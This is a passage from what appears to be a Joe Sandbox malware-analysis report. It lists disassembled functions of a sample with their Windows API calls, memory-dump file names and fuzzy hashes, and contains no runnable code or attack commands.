                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3_HandleWrite
                                                                                              • String ID:
                                                                                              • API String ID: 2898186245-0
                                                                                              • Opcode ID: bede477a2c1d32a5806420432a2cc878d91fdba8b1961aa7e0cfdf98cf4c0a9b
                                                                                              • Instruction ID: 1d39fba1bf8858cfd17c97b5518b00336096bc7ff7ea7a3bcbae9cb3a7dbb234
                                                                                              • Opcode Fuzzy Hash: bede477a2c1d32a5806420432a2cc878d91fdba8b1961aa7e0cfdf98cf4c0a9b
                                                                                              • Instruction Fuzzy Hash: 8641BA39A41214AFDF14DFA4E884BAE7BB6BF84744F146059E801BB391CB319D44CBA0
                                                                                              Function 00E6EFEF Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6EFF6
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00E6EBA7,?,00000001,00000000,?,?,00000024,00E6A4DE,?,00000001,?,?), ref: 00E6F01F
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00E6EBA7,?,00000001,00000000,?,?,00000024,00E6A4DE,?), ref: 00E6F075
                                                                                              • GetLastError.KERNEL32(?,?,00000024,00E6EBA7,?,00000001,00000000,?,?,00000024,00E6A4DE,?,00000001,?,?,00000000), ref: 00E6F0E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                                                              • String ID:
                                                                                              • API String ID: 3709856315-0
                                                                                              • Opcode ID: 61abe74a55d57b8966befb235ded8dc33ecc7338cf752effce208b79d6c1ad74
                                                                                              • Instruction ID: 2525d8552cd3d2eb0371005fdf1fb91ddcec5974106148e7af52d7efb309e34a
                                                                                              • Opcode Fuzzy Hash: 61abe74a55d57b8966befb235ded8dc33ecc7338cf752effce208b79d6c1ad74
                                                                                              • Instruction Fuzzy Hash: 78319471900205DBDF50EFA9F8899EEBBF8EF48384F14642AE541F3251CB349945CB61
                                                                                              Function 00E6E019 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E029
                                                                                              • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E041
                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E073
                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E092
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: fe90bbe6a2e784159d93ea30309dee26c80c77395227f1786504001ae7704368
                                                                                              • Instruction ID: 6a5cc7fa6a8684058bd16d4015a2682d848a2fd765f45a4bc354edccb847c60e
                                                                                              • Opcode Fuzzy Hash: fe90bbe6a2e784159d93ea30309dee26c80c77395227f1786504001ae7704368
                                                                                              • Instruction Fuzzy Hash: D511A338580208EFDF609B54E8046AE37A9AB413A8F20562AE412B53D1D7F19D48DB61
                                                                                              Function 00E7FB4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E7FB52
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,00EB535C), ref: 00E7FC24
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3_Operation_wcslen
                                                                                              • String ID: \S
                                                                                              • API String ID: 3104323202-2521472832
                                                                                              • Opcode ID: d81ef90ae3361324aaca3ab7286f5d2bc8ed92f72e9770eb867544d38722daa0
                                                                                              • Instruction ID: 4935288a64144f557fe4a9527ba6ca94983a34a005a93dd11e3eb5ddf1c6ff4f
                                                                                              • Opcode Fuzzy Hash: d81ef90ae3361324aaca3ab7286f5d2bc8ed92f72e9770eb867544d38722daa0
                                                                                              • Instruction Fuzzy Hash: 83314571D40248DEDB11EFE9D886ADDBBB4BF08354F58616EE019B72A2DB700A45CF10
                                                                                              Function 00E77628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00E7764C
                                                                                              • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00E6736D,00E65AB0,?), ref: 00E77693
                                                                                                • Part of subcall function 00E692EB: __EH_prolog3_GS.LIBCMT ref: 00E692F2
                                                                                                • Part of subcall function 00E69500: __EH_prolog3_GS.LIBCMT ref: 00E69507
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_Thread$CreatePriority
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 3138599208-3849766595
                                                                                              • Opcode ID: 608abc1517c824e05c49e9e0b4c63630649cfdde78ecd4521d4e6b5f715e25b9
                                                                                              • Instruction ID: 81f49860db2ec5d6cbbc549e674390dc50c4bbf5a941fd2f1dfd43557a5ea7a7
                                                                                              • Opcode Fuzzy Hash: 608abc1517c824e05c49e9e0b4c63630649cfdde78ecd4521d4e6b5f715e25b9
                                                                                              • Instruction Fuzzy Hash: 9C0126713887056FE3146EA8ECC2F63339CEB85715F20102EF68AB6185CAF07804C678
                                                                                              Function 00E83C78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00E83C82
                                                                                              • _wcslen.LIBCMT ref: 00E83C99
                                                                                                • Part of subcall function 00E76A89: _wcslen.LIBCMT ref: 00E76AA6
                                                                                                • Part of subcall function 00E6B03D: __EH_prolog3_GS.LIBCMT ref: 00E6B044
                                                                                                • Part of subcall function 00E6B3E1: __EH_prolog3_GS.LIBCMT ref: 00E6B3E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                                                              • String ID: |Z
                                                                                              • API String ID: 1265872803-713293774
                                                                                              • Opcode ID: b669dc8fbe1d409960d5cea9f24b115d5e6afab80aa56627e2c42cbdf5c81152
                                                                                              • Instruction ID: 06b47be2d8eaea856ef7e680bcceffab668a6d15071283c1ef498dbf0961b409
                                                                                              • Opcode Fuzzy Hash: b669dc8fbe1d409960d5cea9f24b115d5e6afab80aa56627e2c42cbdf5c81152
                                                                                              • Instruction Fuzzy Hash: 5911E937941A909ECB05FB65A852BDE7BE49B55310F0462AEE548B7253CBB00A4887A1
                                                                                              Function 00E6DE9A Relevance: 4.6, APIs: 3, Instructions: 115fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6DEA1
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00E6E8F5,?,?,00E6A6B9,?,00000011,?), ref: 00E6DF15
                                                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00E6D303,?,?,?), ref: 00E6DF65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 1771569470-0
                                                                                              • Opcode ID: 5a455afd1ef5f69a2ad9bc28543e1025eb1cfa79adc620560ff7c66c45e1dd0f
                                                                                              • Instruction ID: 6d8cb184ac7428e08f07a9cef9694d001863a16069f1b8a9f0cfd724f78418a5
                                                                                              • Opcode Fuzzy Hash: 5a455afd1ef5f69a2ad9bc28543e1025eb1cfa79adc620560ff7c66c45e1dd0f
                                                                                              • Instruction Fuzzy Hash: 85419F71E142089FDB14DFA8DC8ABEEB7F4EB08324F50661EE056F6281D774A9448B20
                                                                                              Function 00E76C5E Relevance: 4.6, APIs: 3, Instructions: 90libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E76C65
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E76C9A
                                                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00E76D0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1552931673-0
                                                                                              • Opcode ID: 36a3938e3b9d1bce1754344e4e17610105aba1b5ade0d14c51a201dd9103b454
                                                                                              • Instruction ID: 427d50fd491ce9c912f62115f1b4b471e0f54f2670ede4bf1428ca6253872cb2
                                                                                              • Opcode Fuzzy Hash: 36a3938e3b9d1bce1754344e4e17610105aba1b5ade0d14c51a201dd9103b454
                                                                                              • Instruction Fuzzy Hash: BC31AE72D00248DFCF01EBE4D889BEEBBB8EF48314F14611AE209B7245DB345A48CB61
                                                                                              Function 00E6F58B Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6F592
                                                                                              • SetFileAttributesW.KERNELBASE(?,?,00000024,00E6A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00E6F5A8
                                                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F5EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2559025557-0
                                                                                              • Opcode ID: 59cf2a61c48da28a24a3bddcce3794297e4f90a0eb75b988ea6239f4b0c2df76
                                                                                              • Instruction ID: 109960e2bfbb2160776c6f27a6d097f2fda1a64f584abbc381247cd8475b7b96
                                                                                              • Opcode Fuzzy Hash: 59cf2a61c48da28a24a3bddcce3794297e4f90a0eb75b988ea6239f4b0c2df76
                                                                                              • Instruction Fuzzy Hash: D5111471950208EBDF04EFA8E885ADEB7F8FF08354F14A02AE405F7250DB359A94CB64
                                                                                              Function 00E6EC63 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6EC6A
                                                                                              • DeleteFileW.KERNELBASE(?,00000024,00E6D6F7,?), ref: 00E6EC7D
                                                                                              • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00E6ECBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 3558260747-0
                                                                                              • Opcode ID: 6ffb538a6ed18e75f55d87296f839bfd6814ff5356d2a9e2d8bbdef36468344a
                                                                                              • Instruction ID: 0b6f8f8ed97631b3422b6267ca9d0a8f9b518074eda0a2129dab6c00cf47f4a6
                                                                                              • Opcode Fuzzy Hash: 6ffb538a6ed18e75f55d87296f839bfd6814ff5356d2a9e2d8bbdef36468344a
                                                                                              • Instruction Fuzzy Hash: 0F11F975D502199BDF04EFA8E8899DDB7F8EF48350F14642AE405F7390DB3499848B64
                                                                                              Function 00E6ED1F Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6ED26
                                                                                              • GetFileAttributesW.KERNELBASE(?,00000024,00E6ED16,00000000,00E6A4A1,522FB702,?,00E6CDDD,?,?,?,?,?,?,?,?), ref: 00E6ED39
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00E6ED79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2559025557-0
                                                                                              • Opcode ID: 06a1656593cd776eeb109e859defcd3178425b33536fb673b68d452f5841523a
                                                                                              • Instruction ID: bd36a37364d4b325288c198f98fa3409386647e30d7263bc0091caa2e1316992
                                                                                              • Opcode Fuzzy Hash: 06a1656593cd776eeb109e859defcd3178425b33536fb673b68d452f5841523a
                                                                                              • Instruction Fuzzy Hash: 7A1104759002089FCF05EFA8E9899EDB7F9EB49360F14652AE505F7380DB3099848B65
                                                                                              Function 00E849C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 08046cd790f2b7c43dc353ca1bba987ec04aeeb203a250518a0276c959d75f38
                                                                                              • Instruction ID: 4c5c103a12bf5d533e52f06ff0d9b368003c02881920b5a4b2ebb9b6ea436a78
                                                                                              • Opcode Fuzzy Hash: 08046cd790f2b7c43dc353ca1bba987ec04aeeb203a250518a0276c959d75f38
                                                                                              • Instruction Fuzzy Hash: FEB012D235E2137C3344B2183E03D77014DC0C5B10731761EF44CF54C1E4445C800271
                                                                                              Function 00E849D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 47c76fe4a9cead322a475124b9cc63214b9b29d6ee658c27b823711758b50db7
                                                                                              • Instruction ID: 32b001221e7b6489b1b28f355fb1a43a254bd1ca8fb1ae37379b2784df09c5d4
                                                                                              • Opcode Fuzzy Hash: 47c76fe4a9cead322a475124b9cc63214b9b29d6ee658c27b823711758b50db7
                                                                                              • Instruction Fuzzy Hash: 56B012C236E1137C3204B1183E03D77118ED4C5B10731751EF44CF54C1E4445C400271
                                                                                              Function 00E849A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 015d25d17473944fdfcd52a36ed967f46ce6456f9100c8cadb58da618d1c77b6
                                                                                              • Instruction ID: 07aeb080b3e38e0574f64b5835516d0fad5b84e7260193e7c50346bd9d20a667
                                                                                              • Opcode Fuzzy Hash: 015d25d17473944fdfcd52a36ed967f46ce6456f9100c8cadb58da618d1c77b6
                                                                                              • Instruction Fuzzy Hash: 6AB012D235D1136C3204B1183E03D77014CC0C5B10330755EF44CF54D1E4455E810631
                                                                                              Function 00E849B7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
